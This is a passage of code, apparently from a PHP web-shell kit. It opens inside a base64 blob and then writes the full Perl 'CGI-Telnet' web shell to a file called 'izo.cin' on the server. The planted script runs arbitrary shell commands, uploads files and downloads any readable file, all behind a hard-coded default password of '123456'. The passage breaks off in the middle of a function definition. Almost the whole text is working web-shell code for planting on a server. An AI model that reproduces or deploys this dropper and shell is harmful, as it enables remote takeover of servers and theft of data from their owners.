7CgkJcHJpbnQgIkNvbnRlbnQtTGVuZ3RoOiAkRmlsZVNpemVcbiI7CgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPSQxXG5cbiI7CgkJcHJpbnQgd2hpbGUoPFNFTkRGSUxFPik7CgkJY2xvc2UoU0VOREZJTEUpOwoJfQoJZWxzZSAjIGZhaWxlZCB0byBvcGVuIGZpbGUKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7CgkJcHJpbnQgIjxjb2RlPkZhaWxlZCB0byBkb3dubG9hZCAkU2VuZEZpbGU6ICQhPC9jb2RlPiI7CgkJJlByaW50RmlsZURvd25sb2FkRm9ybTsKCQkmUHJpbnRQYWdlRm9vdGVyOwoJfQp9CgoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgZG93bmxvYWRzIGEgZmlsZS4gSXQgZGlzcGxheXMgYSBtZXNzYWdlCiMgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluayB0aHJvdWdoIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLgojIFRoaXMgZnVuY3Rpb24gaXMgYWxzbyBjYWxsZWQgd2hlbiB0aGUgdXNlciBjbGlja3Mgb24gdGhhdCBsaW5rLiBJbiB0aGlzIGNhc2UsCiMgdGhlIGZpbGUgaXMgcmVhZCBhbmQgc2VudCB0byB0aGUgYnJvd3Nlci4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgQmVnaW5Eb3dubG9hZAp7CgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwKCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUKCXsKCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7Cgl9CgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQoJewoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87CgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsKCX0KCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQoJewoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7Cgl9CgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQoJewoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlLiBJZiB0aGUKIyBmaWxlIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGEKIyBmaWxlLCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgVXBsb2FkRmlsZQp7CgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgdXBsb2FkIGZvcm0gYWdhaW4KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpCgl7CgkJJlByaW50UGFnZUhlYWRlcigiZiIpOwoJCSZQcmludEZpbGVVcGxvYWRGb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7CgkJcmV0dXJuOwoJfQoJJlByaW50UGFnZUhlYWRlcigiYyIpOwoKCSMgc3RhcnQgdGhlIHVwbG9hZGluZyBwcm9jZXNzCglwcmludCAiPGNvZGU+VXBsb2FkaW5nICRUcmFuc2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsKCgkjIGdldCB0aGUgZnVsbGx5IHF1YWxpZmllZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBjcmVhdGVkCgljaG9wKCRUYXJnZXROYW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsKCSRUcmFuc2ZlckZpbGUgPX4gbSEoW14vXlxcXSopJCE7CgkkVGFyZ2V0TmFtZSAuPSAkUGF0aFNlcC4kMTsKCgkkVGFyZ2V0RmlsZVNpemUgPSBsZW5ndGgoJGlueydmaWxlZGF0YSd9KTsKCSMgaWYgdGhlIGZpbGUgZXhpc3RzIGFuZCB3ZSBhcmUgbm90IHN1cHBvc2VkIHRvIG92ZXJ3cml0ZSBpdAoJaWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpCgl7CgkJcHJpbnQgIkZhaWxlZDogRGVzdGluYXRpb24gZmlsZSBhbHJlYWR5IGV4aXN0cy48YnI+IjsKCX0KCWVsc2UgIyBmaWxlIGlzIG5vdCBwcmVzZW50Cgl7CgkJaWYob3BlbihVUExPQURGSUxFLCAiPiRUYXJnZXROYW1lIikpCgkJewoJCQliaW5tb2RlKFVQTE9BREZJTEUpIGlmICRXaW5OVDsKCQkJcHJpbnQgVVBMT0FERklMRSAkaW57J2ZpbGVkYXRhJ307CgkJCWNsb3NlKFVQTE9BREZJTEUpOwoJCQlwcmludCAiVHJhbnNmZXJlZCAkVGFyZ2V0RmlsZVNpemUgQnl0ZXMuPGJyPiI7CgkJCXByaW50ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7CgkJfQoJCWVsc2UKCQl7CgkJCXByaW50ICJGYWlsZWQ6ICQhPGJyPiI7CgkJfQoJfQoJcHJpbnQgIjwvY29kZT4iOwoJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkmUHJpbnRQYWdlRm9vdGVyOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byBkb3dubG9hZCBhIGZpbGUuIElmIHRoZQojIGZpbGVuYW1lIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGEKIyBmaWxlLCBvdGhlcndpc2UgaXQgZGlzcGxheXMgYSBtZXNzYWdlIHRvIHRoZSB1c2VyIGFuZCBwcm92aWRlcyBhIGxpbmsKIyB0aHJvdWdoICB3aGljaCB0aGUgZmlsZSBjYW4gYmUgZG93bmxvYWRlZC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgRG93bmxvYWRGaWxlCnsKCSMgaWYgbm8gZmlsZSBpcyBzcGVjaWZpZWQsIHByaW50IHRoZSBkb3dubG9hZCBmb3JtIGFnYWluCglpZigkVHJhbnNmZXJGaWxlIGVxICIiKQoJewoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsKCQkmUHJpbnRGaWxlRG93bmxvYWRGb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7CgkJcmV0dXJuOwoJfQoJCgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwKCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUKCXsKCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7Cgl9CgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQoJewoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87CgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsKCX0KCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQoJewoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7Cgl9CgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQoJewoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgTWFpbiBQcm9ncmFtIC0gRXhlY3V0aW9uIFN0YXJ0cyBIZXJlCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KJlJlYWRQYXJzZTsKJkdldENvb2tpZXM7CgokU2NyaXB0TG9jYXRpb24gPSAkRU5WeydTQ1JJUFRfTkFNRSd9OwokU2VydmVyTmFtZSA9ICRFTlZ7J1NFUlZFUl9OQU1FJ307CiRMb2dpblBhc3N3b3JkID0gJGlueydwJ307CiRSdW5Db21tYW5kID0gJGlueydjJ307CiRUcmFuc2ZlckZpbGUgPSAkaW57J2YnfTsKJE9wdGlvbnMgPSAkaW57J28nfTsKCiRBY3Rpb24gPSAkaW57J2EnfTsKJEFjdGlvbiA9ICJsb2dpbiIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNpZmllZCwgdXNlIGRlZmF1bHQKCiMgZ2V0IHRoZSBkaXJlY3RvcnkgaW4gd2hpY2ggdGhlIGNvbW1hbmRzIHdpbGwgYmUgZXhlY3V0ZWQKJEN1cnJlbnREaXIgPSAkaW57J2QnfTsKY2hvcCgkQ3VycmVudERpciA9IGAkQ21kUHdkYCkgaWYoJEN1cnJlbnREaXIgZXEgIiIpOwoKJExvZ2dlZEluID0gJENvb2tpZXN7J1NBVkVEUFdEJ30gZXEgJFBhc3N3b3JkOwoKaWYoJEFjdGlvbiBlcSAibG9naW4iIHx8ICEkTG9nZ2VkSW4pICMgdXNlciBuZWVkcy9oYXMgdG8gbG9naW4KewoJJlBlcmZvcm1Mb2dpbjsKfQplbHNpZigkQWN0aW9uIGVxICJjb21tYW5kIikgIyB1c2VyIHdhbnRzIHRvIHJ1biBhIGNvbW1hbmQKewoJJkV4ZWN1dGVDb21tYW5kOwp9CmVsc2lmKCRBY3Rpb24gZXEgInVwbG9hZCIpICMgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlCnsKCSZVcGxvYWRGaWxlOwp9CmVsc2lmKCRBY3Rpb24gZXEgImRvd25sb2FkIikgIyB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZQp7CgkmRG93bmxvYWRGaWxlOwp9CmVsc2lmKCRBY3Rpb24gZXEgImxvZ291dCIpICMgdXNlciB3YW50cyB0byBsb2dvdXQKewoJJlBlcmZvcm1Mb2dvdXQ7Cn0K';
        $file = fopen("izo.cin", "w+");
        $write = fwrite($file, "#!/usr/bin/perl\n#------------------------------------------------------------------------------\n# Copyright and Licence\n#------------------------------------------------------------------------------\n# CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server\n#\n# Copyright (C) 2001 Rohitab Batra\n# Permission is granted to use, distribute and modify this script so long\n# as this copyright notice is left intact. If you make changes to the script\n# please document them and inform me. If you would like any changes to be made\n# in this script, you can e-mail me.\n#\n# Author: Rohitab Batra\n# Author e-mail: [email protected]\n# Author Homepage: http://www.rohitab.com/\n# Script Homepage: http://www.rohitab.com/cgiscripts/cgitelnet.html\n# Product Support: http://www.rohitab.com/support/\n# Discussion Forum: http://www.rohitab.com/discuss/\n# Mailing List: http://www.rohitab.com/mlist/\n#------------------------------------------------------------------------------\n\n#------------------------------------------------------------------------------\n# Installation\n#------------------------------------------------------------------------------\n# To install this script\n#\n# 1. Modify the first line \"#!/usr/bin/perl\" to point to the correct path on\n#    your server. For most servers, you may not need to modify this.\n# 2. Change the password in the Configuration section below.\n# 3. If you're running the script under Windows NT, set \$WinNT = 1 in the\n#    Configuration Section below.\n# 4. Upload the script to a directory on your server which has permissions to\n#    execute CGI scripts. This is usually cgi-bin. Make sure that you upload\n#    the script in ASCII mode.\n# 5. Change the permission (CHMOD) of the script to 755.\n# 6. Open the script in your web browser. If you uploaded the script in\n#    cgi-bin, this should be http://www.yourserver.com/cgi-bin/cgitelnet.pl\n# 7. Login using the password that you specified in Step 2.\n#------------------------------------------------------------------------------\n\n#------------------------------------------------------------------------------\n# Configuration: You need to change only \$Password and \$WinNT. The other\n# values should work fine for most systems.\n#------------------------------------------------------------------------------\n\$Password = \"123456\";\t\t# Change this. You will need to enter this\n\t\t\t\t# to login.\n\n\$WinNT = 0;\t\t\t# You need to change the value of this to 1 if\n\t\t\t\t# you're running this script on a Windows NT\n\t\t\t\t# machine. If you're running it on Unix, you\n\t\t\t\t# can leave the value as it is.\n\n\$NTCmdSep = \"&\";\t\t# This character is used to seperate 2 commands\n\t\t\t\t# in a command line on Windows NT.\n\n\$UnixCmdSep = \";\";\t\t# This character is used to seperate 2 commands\n\t\t\t\t# in a command line on Unix.\n\n\$CommandTimeoutDuration = 10;\t# Time in seconds after commands will be killed\n\t\t\t\t# Don't set this to a very large value. This is\n\t\t\t\t# useful for commands that may hang or that\n\t\t\t\t# take very long to execute, like \"find /\".\n\t\t\t\t# This is valid only on Unix servers. It is\n\t\t\t\t# ignored on NT Servers.\n\n\$ShowDynamicOutput = 1;\t\t# If this is 1, then data is sent to the\n\t\t\t\t# browser as soon as it is output, otherwise\n\t\t\t\t# it is buffered and send when the command\n\t\t\t\t# completes. This is useful for commands like\n\t\t\t\t# ping, so that you can see the output as it\n\t\t\t\t# is being generated.\n\n# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!\n\n\$CmdSep = (\$WinNT ? \$NTCmdSep : \$UnixCmdSep);\n\$CmdPwd = (\$WinNT ? \"cd\" : \"pwd\");\n\$PathSep = (\$WinNT ? \"\\\\\" : \"/\");\n\$Redirector = (\$WinNT ? \" 2>&1 1>&2\" : \" 1>&1 2>&1\");\n\n#------------------------------------------------------------------------------\n# Reads the input sent by the browser and parses the input variables. It\n# parses GET, POST and multipart/form-data that is used for uploading files.\n# The filename is stored in \$in{'f'} and the data is stored in \$in{'filedata'}.\n# Other variables can be accessed using \$in{'var'}, where var is the name of\n# the variable. Note: Most of the code in this function is taken from other CGI\n# scripts.\n#------------------------------------------------------------------------------\nsub ReadParse \n{\n\tlocal (*in) = @_ if @_;\n\tlocal (\$i, \$loc, \$key, \$val);\n\t\n\t\$MultipartFormData = \$ENV{'CONTENT_TYPE'} =~ /multipart\\/form-data; boundary=(.+)\$/;\n\n\tif(\$ENV{'REQUEST_METHOD'} eq \"GET\")\n\t{\n\t\t\$in = \$ENV{'QUERY_STRING'};\n\t}\n\telsif(\$ENV{'REQUEST_METHOD'} eq \"POST\")\n\t{\n\t\tbinmode(STDIN) if \$MultipartFormData & \$WinNT;\n\t\tread(STDIN, \$in, \$ENV{'CONTENT_LENGTH'});\n\t}\n\n\t# handle file upload data\n\tif(\$ENV{'CONTENT_TYPE'} =~ /multipart\\/form-data; boundary=(.+)\$/)\n\t{\n\t\t\$Boundary = '--'.\$1; # please refer to RFC1867 \n\t\t@list = split(/\$Boundary/, \$in); \n\t\t\$HeaderBody = \$list[1];\n\t\t\$HeaderBody =~ /\\r\\n\\r\\n|\\n\\n/;\n\t\t\$Header = \$`;\n\t\t\$Body = \$';\n \t\t\$Body =~ s/\\r\\n\$//; # the last \\r\\n was put in by Netscape\n\t\t\$in{'filedata'} = \$Body;\n\t\t\$Header =~ /filename=\\\"(.+)\\\"/; \n\t\t\$in{'f'} = \$1; \n\t\t\$in{'f'} =~ s/\\\"//g;\n\t\t\$in{'f'} =~ s/\\s//g;\n\n\t\t# parse trailer\n\t\tfor(\$i=2; \$list[\$i]; \$i++)\n\t\t{ \n\t\t\t\$list[\$i] =~ s/^.+name=\$//;\n\t\t\t\$list[\$i] =~ /\\\"(\\w+)\\\"/;\n\t\t\t\$key = \$1;\n\t\t\t\$val = \$';\n\t\t\t\$val =~ s/(^(\\r\\n\\r\\n|\\n\\n))|(\\r\\n\$|\\n\$)//g;\n\t\t\t\$val =~ s/%(..)/pack(\"c\", hex(\$1))/ge;\n\t\t\t\$in{\$key} = \$val; \n\t\t}\n\t}\n\telse # standard post data (url encoded, not multipart)\n\t{\n\t\t@in = split(/&/, \$in);\n\t\tforeach \$i (0 .. \$#in)\n\t\t{\n\t\t\t\$in[\$i] =~ s/\\+/ /g;\n\t\t\t(\$key, \$val) = split(/=/, \$in[\$i], 2);\n\t\t\t\$key =~ s/%(..)/pack(\"c\", hex(\$1))/ge;\n\t\t\t\$val =~ s/%(..)/pack(\"c\", hex(\$1))/ge;\n\t\t\t\$in{\$key} .= \"\\0\" if (defined(\$in{\$key}));\n\t\t\t\$in{\$key} .= \$val;\n\t\t}\n\t}\n}\n\n#------------------------------------------------------------------------------\n# Prints the HTML Page Header\n# Argument 1: Form item name to which focus should be set\n#------------------------------------------------------------------------------\nsub PrintPageHeader\n{\n\t\$EncodedCurrentDir = \$CurrentDir;\n\t\$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack(\"H*\",\$1)/eg;\n\tprint \"Content-type: text/html\\n\\n\";\n\tprint <<END;\n<html>\n<head>\n<title>CGI-Telnet Version 1.0</title>\n\$HtmlMetaHeader\n</head>\n<body onLoad=\"document.f.@_.focus()\" bgcolor=\"#000000\" topmargin=\"0\" leftmargin=\"0\" marginwidth=\"0\" marginheight=\"0\">\n<table border=\"1\" width=\"100%\" cellspacing=\"0\" cellpadding=\"2\">\n<tr>\n<td bgcolor=\"#C2BFA5\" bordercolor=\"#000080\" align=\"center\">\n<b><font color=\"#000080\" size=\"2\">#</font></b></td>\n<td bgcolor=\"#000080\"><font face=\"Verdana\" size=\"2\" color=\"#FFFFFF\"><b>CGI-Telnet Version 1.0 - Connected to \$ServerName</b></font></td>\n</tr>\n<tr>\n<td colspan=\"2\" bgcolor=\"#C2BFA5\"><font face=\"Verdana\" size=\"2\">\n<a href=\"\$ScriptLocation?a=upload&d=\$EncodedCurrentDir\">Upload File</a> | \n<a href=\"\$ScriptLocation?a=download&d=\$EncodedCurrentDir\">Download File</a> |\n<a href=\"\$ScriptLocation?a=logout\">Disconnect</a> |\n<a href=\"http://www.rohitab.com/cgiscripts/cgitelnet.html\">Help</a>\n</font></td>\n</tr>\n</table>\n<font color=\"#C0C0C0\" size=\"3\">\nEND\n}\n\n#------------------------------------------------------------------------------\n# Prints the Login Screen\n#------------------------------------------------------------------------------\nsub PrintLoginScreen\n{\n\t\$Message = q\$<pre><font color=\"#669999\"> _____  _____  _____          _____        _               _\n/  __ \\|  __ \\|_   _|        |_   _|      | |             | |\n| /  \\/| |  \\/  | |   ______   | |    ___ | | _ __    ___ | |_\n| |    | | __   | |  |______|  | |   / _ \\| || '_ \\  / _ \\| __|\n| \\__/\\| |_\\ \\ _| |_           | |  |  __/| || | | ||  __/| |_\n \\____/ \\____/ \\___/           \\_/   \\___||_||_| |_| \\___| \\__| 1.0\n                                         \n</font><font color=\"#FF0000\">                      ______             </font><font color=\"#AE8300\">\xc2\xa9 2001, Rohitab Batra</font><font color=\"#FF0000\">\n                   .-&quot;      &quot;-.\n                  /            \\\n                 |              |\n                 |,  .-.  .-.  ,|\n                 | )(_o/  \\o_)( |\n                 |/     /\\     \\|\n       (@_       (_     ^^     _)\n  _     ) \\</font><font color=\"#808080\">_______</font><font color=\"#FF0000\">\\</font><font color=\"#808080\">__</font><font color=\"#FF0000\">|IIIIII|</font><font color=\"#808080\">__</font><font color=\"#FF0000\">/</font><font color=\"#808080\">_______________________\n</font><font color=\"#FF0000\"> (_)</font><font color=\"#808080\">@8@8</font><font color=\"#FF0000\">{}</font><font color=\"#808080\">&lt;________</font><font color=\"#FF0000\">|-\\IIIIII/-|</font><font color=\"#808080\">________________________&gt;</font><font color=\"#FF0000\">\n        )_/        \\          / \n       (@           `--------`\n             </font><font color=\"#AE8300\">W A R N I N G: Private Server</font></pre>\n\$;\n#'\n\tprint <<END;\n<code>\nTrying \$ServerName...<br>\nConnected to \$ServerName<br>\nEscape character is ^]\n<code>\$Message\nEND\n}\n\n#------------------------------------------------------------------------------\n# Prints the message that informs the user of a failed login\n#------------------------------------------------------------------------------\nsub PrintLoginFailedMessage\n{\n\tprint <<END;\n<code>\n<br>login: admin<br>\npassword:<br>\nLogin incorrect<br><br>\n</code>\nEND\n}\n\n#------------------------------------------------------------------------------\n# Prints the HTML form for logging in\n#------------------------------------------------------------------------------\nsub PrintLoginForm\n{\n\tprint <<END;\n<code>\n<form name=\"f\" method=\"POST\" action=\"\$ScriptLocation\">\n<input type=\"hidden\" name=\"a\" value=\"login\">\nlogin: admin<br>\npassword:<input type=\"password\" name=\"p\">\n<input type=\"submit\" value=\"Enter\">\n</form>\n</code>\nEND\n}\n\n#------------------------------------------------------------------------------\n# Prints the footer for the HTML Page\n#------------------------------------------------------------------------------\nsub PrintPageFooter\n{\n\tprint \"</font></body></html>\";\n}\n\n#------------------------------------------------------------------------------\n# Retreives the values of all cookies. The cookies can be accesses using the\n# variable \$Cookies{''}\n#------------------------------------------------------------------------------\nsub GetCookies\n{\n\t@httpcookies = split(/; /,\$ENV{'HTTP_COOKIE'});\n\tforeach \$cookie(@httpcookies)\n\t{\n\t\t(\$id, \$val) = split(/=/, \$cookie);\n\t\t\$Cookies{\$id} = \$val;\n\t}\n}\n\n#------------------------------------------------------------------------------\n# Prints the screen when the user logs out\n#------------------------------------------------------------------------------\nsub PrintLogoutScreen\n{\n\tprint \"<code>Connection closed by foreign host.<br><br></code>\";\n}\n\n#------------------------------------------------------------------------------\n# Logs out the user and allows the user to login again\n#------------------------------------------------------------------------------\nsub PerformLogout\n{\n\tprint \"Set-Cookie: SAVEDPWD=;\\n\"; # remove password cookie\n\t&PrintPageHeader(\"p\");\n\t&PrintLogoutScreen;\n\t&PrintLoginScreen;\n\t&PrintLoginForm;\n\t&PrintPageFooter;\n}\n\n#------------------------------------------------------------------------------\n# This function is called to login the user. If the password matches, it\n# displays a page that allows the user to run commands. If the password doens't\n# match or if no password is entered, it displays a form that allows the user\n# to login\n#------------------------------------------------------------------------------\nsub PerformLogin \n{\n\tif(\$LoginPassword eq \$Password) # password matched\n\t{\n\t\tprint \"Set-Cookie: SAVEDPWD=\$LoginPassword;\\n\";\n\t\t&PrintPageHeader(\"c\");\n\t\t&PrintCommandLineInputForm;\n\t\t&PrintPageFooter;\n\t}\n\telse # password didn't match\n\t{\n\t\t&PrintPageHeader(\"p\");\n\t\t&PrintLoginScreen;\n\t\tif(\$LoginPassword ne \"\") # some password was entered\n\t\t{\n\t\t\t&PrintLoginFailedMessage;\n\t\t}\n\t\t&PrintLoginForm;\n\t\t&PrintPageFooter;\n\t}\n}\n\n#------------------------------------------------------------------------------\n# Prints the HTML form that allows the user to enter commands\n#------------------------------------------------------------------------------\nsub PrintCommandLineInputForm\n{\n\t\$Prompt = \$WinNT ? \"\$CurrentDir> \" : \"[admin\\@\$ServerName \$CurrentDir]\\\$ \";\n\tprint <<END;\n<code>\n<form name=\"f\" method=\"POST\" action=\"\$ScriptLocation\">\n<input type=\"hidden\" name=\"a\" value=\"command\">\n<input type=\"hidden\" name=\"d\" value=\"\$CurrentDir\">\n\$Prompt\n<input type=\"text\" name=\"c\">\n<input type=\"submit\" value=\"Enter\">\n</form>\n</code>\nEND\n}\n\n#------------------------------------------------------------------------------\n# Prints the HTML form that allows the user to download files\n#------------------------------------------------------------------------------\nsub PrintFileDownloadForm\n{\n\t\$Prompt = \$WinNT ? \"\$CurrentDir> \" : \"[admin\\@\$ServerName \$CurrentDir]\\\$ \";\n\tprint <<END;\n<code>\n<form name=\"f\" method=\"POST\" action=\"\$ScriptLocation\">\n<input type=\"hidden\" name=\"d\" value=\"\$CurrentDir\">\n<input type=\"hidden\" name=\"a\" value=\"download\">\n\$Prompt download<br><br>\nFilename: <input type=\"text\" name=\"f\" size=\"35\"><br><br>\nDownload: <input type=\"submit\" value=\"Begin\">\n</form>\n</code>\nEND\n}\n\n#------------------------------------------------------------------------------\n# Prints the HTML form that allows the user to upload files\n#------------------------------------------------------------------------------\nsub PrintFileUploadForm\n{\n\t\$Prompt = \$WinNT ? \"\$CurrentDir> \" : \"[admin\\@\$ServerName \$CurrentDir]\\\$ \";\n\tprint <<END;\n<code>\n<form name=\"f\" enctype=\"multipart/form-data\" method=\"POST\" action=\"\$ScriptLocation\">\n\$Prompt upload<br><br>\nFilename: <input type=\"file\" name=\"f\" size=\"35\"><br><br>\nOptions: &nbsp;<input type=\"checkbox\" name=\"o\" value=\"overwrite\">\nOverwrite if it Exists<br><br>\nUpload:&nbsp;&nbsp;&nbsp;<input type=\"submit\" value=\"Begin\">\n<input type=\"hidden\" name=\"d\" value=\"\$CurrentDir\">\n<input type=\"hidden\" name=\"a\" value=\"upload\">\n</form>\n</code>\nEND\n}\n\n#------------------------------------------------------------------------------\n# This function is called when the timeout for a command expires. We need to\n# terminate the script immediately. This function is valid only on Unix. It is\n# never called when the script is running on NT.\n#------------------------------------------------------------------------------\nsub CommandTimeout\n{\n\tif(!\$WinNT)\n\t{\n\t\talarm(0);\n\t\tprint <<END;\n</xmp>\n<code>\nCommand exceeded maximum time of \$CommandTimeoutDuration second(s).\n<br>Killed it!\n<code>\nEND\n\t\t&PrintCommandLineInputForm;\n\t\t&PrintPageFooter;\n\t\texit;\n\t}\n}\n\n#------------------------------------------------------------------------------\n# This function is called to execute commands. It displays the output of the\n# command and allows the user to enter another command. The change directory\n# command is handled differently. In this case, the new directory is stored in\n# an internal variable and is used each time a command has to be executed. The\n# output of the change directory command is not displayed to the users\n# therefore error messages cannot be displayed.\n#------------------------------------------------------------------------------\nsub ExecuteCommand\n{\n\tif(\$RunCommand =~ m/^\\s*cd\\s+(.+)/) # it is a change dir command\n\t{\n\t\t# we change the directory internally. The output of the\n\t\t# command is not displayed.\n\t\t\n\t\t\$OldDir = \$CurrentDir;\n\t\t\$Command = \"cd \\\"\$CurrentDir\\\"\".\$CmdSep.\"cd \$1\".\$CmdSep.\$CmdPwd;\n\t\tchop(\$CurrentDir = `\$Command`);\n\t\t&PrintPageHeader(\"c\");\n\t\t\$Prompt = \$WinNT ? \"\$OldDir> \" : \"[admin\\@\$ServerName \$OldDir]\\\$ \";\n\t\tprint \"<code>\$Prompt \$RunCommand</code>\";\n\t}\n\telse # some other command, display the output\n\t{\n\t\t&PrintPageHeader(\"c\");\n\t\t\$Prompt = \$WinNT ? \"\$CurrentDir> \" : \"[admin\\@\$ServerName \$CurrentDir]\\\$ \";\n\t\tprint \"<code>\$Prompt \$RunCommand</code><xmp>\";\n\t\t\$Command = \"cd \\\"\$CurrentDir\\\"\".\$CmdSep.\$RunCommand.\$Redirector;\n\t\tif(!\$WinNT)\n\t\t{\n\t\t\t\$SIG{'ALRM'} = \\&CommandTimeout;\n\t\t\talarm(\$CommandTimeoutDuration);\n\t\t}\n\t\tif(\$ShowDynamicOutput) # show output as it is generated\n\t\t{\n\t\t\t\$|=1;\n\t\t\t\$Command .= \" |\";\n\t\t\topen(CommandOutput, \$Command);\n\t\t\twhile(<CommandOutput>)\n\t\t\t{\n\t\t\t\t\$_ =~ s/(\\n|\\r\\n)\$//;\n\t\t\t\tprint \"\$_\\n\";\n\t\t\t}\n\t\t\t\$|=0;\n\t\t}\n\t\telse # show output after command completes\n\t\t{\n\t\t\tprint `\$Command`;\n\t\t}\n\t\tif(!\$WinNT)\n\t\t{\n\t\t\talarm(0);\n\t\t}\n\t\tprint \"</xmp>\";\n\t}\n\t&PrintCommandLineInputForm;\n\t&PrintPageFooter;\n}\n\n#------------------------------------------------------------------------------\n# This function displays the page that contains a link which allows the user\n# to download the specified file. The page also contains a auto-refresh\n# feature that starts the download automatically.\n# Argument 1: Fully qualified filename of the file to be downloaded\n#------------------------------------------------------------------------------\nsub 